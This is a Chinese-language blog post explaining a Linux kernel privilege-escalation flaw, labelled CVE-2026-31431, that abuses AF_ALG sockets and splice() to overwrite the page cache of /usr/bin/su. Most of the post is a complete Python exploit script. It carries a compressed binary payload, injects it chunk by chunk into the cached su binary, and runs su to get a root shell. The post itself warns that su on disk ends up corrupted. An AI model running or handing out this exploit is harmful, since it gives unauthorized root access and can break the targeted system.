Cheug's Blog

当前位置:网站首页 / 技术积累 / 正文

Linux内核AF_ALG与Splice越权漏洞(CVE-2026-31431)

2026-05-08 / 技术积累 / 16 次围观 / 0 次吐槽 /

image.pngimage.png

1. 漏洞概述

该脚本利用的是 Linux 内核在处理 页面缓存(Page Cache) 时的逻辑缺陷,结合了 AF_ALG(内核加密算法接口)splice() 系统调用


2. 核心技术

  • Page Cache(页面缓存):内核为了提高磁盘 I/O 效率,会将文件内容缓存在内存中。

  • AF_ALG (Address Family - Algorithm):Linux 内核 2.6.38 后引入的用户态接口,允许程序在用户态调用内核实现的加密算法。

  • splice() 系统调用:一种“零拷贝”技术,可以在两个文件描述符(FD)之间直接移动数据,而无需将数据拷贝到用户空间缓冲区。


3. 漏洞执行方案

脚本的执行过程可以分为以下四个关键阶段:

第一阶段:初始化与 Payload 准备

脚本首先打开目标 SUID 程序 /usr/bin/su。正常情况下,普通用户对该文件只有执行和读取权限,无法写入。 脚本随后通过 zlib 解压一段十六进制字符串。这段 Payload 通常是修改过的二进制代码,用于替换 su 内部的 setuid 检查逻辑。

第二阶段:建立内核通信链路 (AF_ALG)

脚本创建了一个 AF_ALG 类型的套接字,并绑定到 aead 加密算法。

  • 关键点:通过 setsockopt 设置精心构造的参数。这是为了在内核空间操纵内存布局,为后续的非法写入做铺垫。这步操作本质上是在寻找一个“写入口”,利用内核对加密缓冲区管理的不当来实现跨页面操作。

第三阶段:页面缓存污染 (Splice 注入)

这是攻击的“手术刀”部分:

  1. 创建管道 (Pipe):脚本创建一个匿名管道作为数据中转站。

  2. 第一次 Splice:将目标文件(/usr/bin/su)的内容“拼接”到管道的写端。此时,目标文件的内存页面(Page Cache)被链接到了管道缓冲区。

  3. 第二次 Splice:将管道读端的数据推送到 AF_ALG 的 FD 中。由于内核在某些版本中未能正确检查管道缓冲区标志位(如 PIPE_BUF_FLAG_CAN_MERGE),导致后续写入管道的数据会直接覆盖原本属于 /usr/bin/su 的页面缓存。

第四阶段:触发与提权

此时,物理硬盘上的 /usr/bin/su 虽然没变,但内存中的副本已被篡改。 脚本执行 os.system("su")。系统在运行 su 时会直接加载内存中那个被污染的副本。被污染后的 su 不再验证密码,直接赋予用户 Root 权限。

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function
import os
import zlib
import socket
import ctypes
import struct
import binascii
import  shutil
import sys

libc = ctypes.CDLL("libc.so.6", use_errno=True)

# 严格声明 C 函数签名,防止寄存器脏数据
libc.splice.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint]
libc.splice.restype = ctypes.c_ssize_t
libc.sendmsg.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_int]
libc.sendmsg.restype = ctypes.c_ssize_t
libc.bind.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_uint32]
libc.bind.restype = ctypes.c_int
libc.accept.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
libc.accept.restype = ctypes.c_int

AF_ALG = 38
SOL_ALG = 279

def hex_decode(hex_str):
    return binascii.unhexlify(hex_str)

def c_splice(fd_in, off_in, fd_out, off_out, length, flags):
    off_in_ptr = ctypes.byref(ctypes.c_longlong(off_in)) if off_in is not None else None
    off_out_ptr = ctypes.byref(ctypes.c_longlong(off_out)) if off_out is not None else None
    
    res = libc.splice(fd_in, off_in_ptr, fd_out, off_out_ptr, length, flags)
    if res == -1:
        errno = ctypes.get_errno()
        raise OSError(errno, "Splice failed: " + os.strerror(errno))
    return res

# 添加了 flags 参数
def c_sendmsg(fd, data, control_msgs, flags=0):
    class iovec(ctypes.Structure):
        _fields_ = [("iov_base", ctypes.c_void_p), ("iov_len", ctypes.c_size_t)]
        
    class msghdr(ctypes.Structure):
        _fields_ = [
            ("msg_name", ctypes.c_void_p),
            ("msg_namelen", ctypes.c_uint32),
            ("msg_iov", ctypes.POINTER(iovec)),
            ("msg_iovlen", ctypes.c_size_t),
            ("msg_control", ctypes.c_void_p),
            ("msg_controllen", ctypes.c_size_t),
            ("msg_flags", ctypes.c_int),
        ]

    data_buf = ctypes.create_string_buffer(data)
    iov = iovec(ctypes.cast(data_buf, ctypes.c_void_p), len(data))

    def CMSG_ALIGN(length):
        return (length + 7) & ~7

    ctrl_buf = b""
    for level, type_, cmsg_data in control_msgs:
        cmsg_len = 16 + len(cmsg_data)
        cmsg_space = CMSG_ALIGN(cmsg_len)
        header = struct.pack("Qii", cmsg_len, level, type_)
        pad_len = cmsg_space - cmsg_len
        ctrl_buf += header + cmsg_data + (b'\x00' * pad_len)
        
    ctrl_buffer = ctypes.create_string_buffer(ctrl_buf)

    msg = msghdr()
    msg.msg_name = None
    msg.msg_namelen = 0
    msg.msg_iov = ctypes.pointer(iov)
    msg.msg_iovlen = 1
    msg.msg_control = ctypes.cast(ctrl_buffer, ctypes.c_void_p)
    msg.msg_controllen = len(ctrl_buf)
    msg.msg_flags = 0

    # 传入 flags (MSG_MORE)
    res = libc.sendmsg(fd, ctypes.pointer(msg), flags)
    if res == -1:
        errno = ctypes.get_errno()
        raise OSError(errno, "sendmsg failed: " + os.strerror(errno))
    return res

def inject_chunk(target_fd, offset, chunk):
    s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
    
    try:
        alg_type = b"aead"
        alg_name = b"authencesn(hmac(sha256),cbc(aes))"
        sockaddr_bin = struct.pack("H 14s I I 64s", AF_ALG, alg_type, 0, 0, alg_name)
        if libc.bind(s.fileno(), sockaddr_bin, len(sockaddr_bin)) == -1:
            raise OSError("AF_ALG Bind failed")

        opt_data = hex_decode('0800010000000010' + '0' * 64)
        s.setsockopt(SOL_ALG, 1, opt_data)
        s.setsockopt(SOL_ALG, 5, b'\x00\x00\x00\x00')

        if sys.version_info[0] == 2:
            conn_fd = libc.accept(s.fileno(), None, None)
            if conn_fd < 0:
                err = ctypes.get_errno()
                raise OSError(err, "libc.accept failed: " + os.strerror(err))
            has_py_sock = False
        else:
            conn_sock, _ = s.accept()
            conn_fd = conn_sock.fileno()
            has_py_sock = True
        
        try:
            null_byte = hex_decode('00')
            control_msgs = [
                (SOL_ALG, 3, null_byte * 4),               
                (SOL_ALG, 2, b'\x10' + null_byte * 19),    
                (SOL_ALG, 4, b'\x08' + null_byte * 3),     
            ]
            
            payload_to_send = b"A" * 4 + chunk
            
            # 关键:传 32768 (MSG_MORE)
            if has_py_sock and hasattr(conn_sock, 'sendmsg'):
                conn_sock.sendmsg([payload_to_send], control_msgs, 32768)
            else:
                c_sendmsg(conn_fd, payload_to_send, control_msgs, 32768)

            p_read, p_write = os.pipe()
            length = offset + 4
            
            c_splice(target_fd, 0, p_write, None, length, 0)
            c_splice(p_read, None, conn_fd, None, length, 0)
            
            try:
                os.read(conn_fd, 8 + offset) 
            except:
                pass
                
            os.close(p_read)
            os.close(p_write)
        finally:
            if has_py_sock:
                conn_sock.close()
            else:
                os.close(conn_fd)
    finally:
        s.close()

def main():
    py_ver = sys.version_info[0]
    print("[*] 正在启动漏洞研究脚本(Python %d)..." % py_ver)
    
    target_path = "/usr/bin/su"
    backup_path = "/tmp/su_backup.bak"
    
    if not os.path.exists(target_path):
        print("[-] 错误:目标文件不存在")
        return

    # ---------------------------------------------------------
    # 安全备份逻辑
    # ---------------------------------------------------------
    print("[*] 正在备份目标文件,防止脏页回写导致系统损坏...")
    try:
        # 使用 copy2 尽量保留原始的文件元数据
        shutil.copy2(target_path, backup_path)
        print("[+] 备份成功,文件已保存至: %s" % backup_path)
    except Exception as e:
        print("[-] 备份失败: %s" % str(e))
        print("[-] 出于安全考虑,已终止脚本执行。")
        return
    # ---------------------------------------------------------

    hex_payload = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
    payload = zlib.decompress(hex_decode(hex_payload))
    
    try:
        target_fd = os.open(target_path, os.O_RDONLY)
    except Exception as e:
        print("[-] 无法读取目标文件: " + str(e))
        return

    print("[*] 注入开始,目标: %s (Payload 长度: %d 字节)" % (target_path, len(payload)))

    for i in range(0, len(payload), 4):
        chunk = payload[i:i+4]
        try:
            inject_chunk(target_fd, i, chunk)
            print("[+] 注入进度: %d/%d" % (i + 4, len(payload)), end='\r')
        except Exception as e:
            print("\n[!] 偏移量 %d 处发生错误: %s" % (i, str(e)))
            break

    print("\n\n[*] 注入过程结束。")
    
    # ---------------------------------------------------------
    # 提权后恢复操作提示
    # ---------------------------------------------------------
    print("[!] 警告:由于内核脏页回写机制,磁盘上的 su 文件即将被永久破坏!")
    print("[*] 提权成功获得 root Shell 后,请务必立即执行以下命令恢复环境:")
    print("---------------------------------------------------------")
    print("    cat %s > %s && chmod 4755 %s" % (backup_path, target_path, target_path))
    print("---------------------------------------------------------")
    print("[*] 正在尝试触发提权...")
    
    # 执行 su 触发提权
    os.system("su")

if __name__ == "__main__":
    main()



Powered By Cheug's Blog

Copyright Cheug Rights Reserved.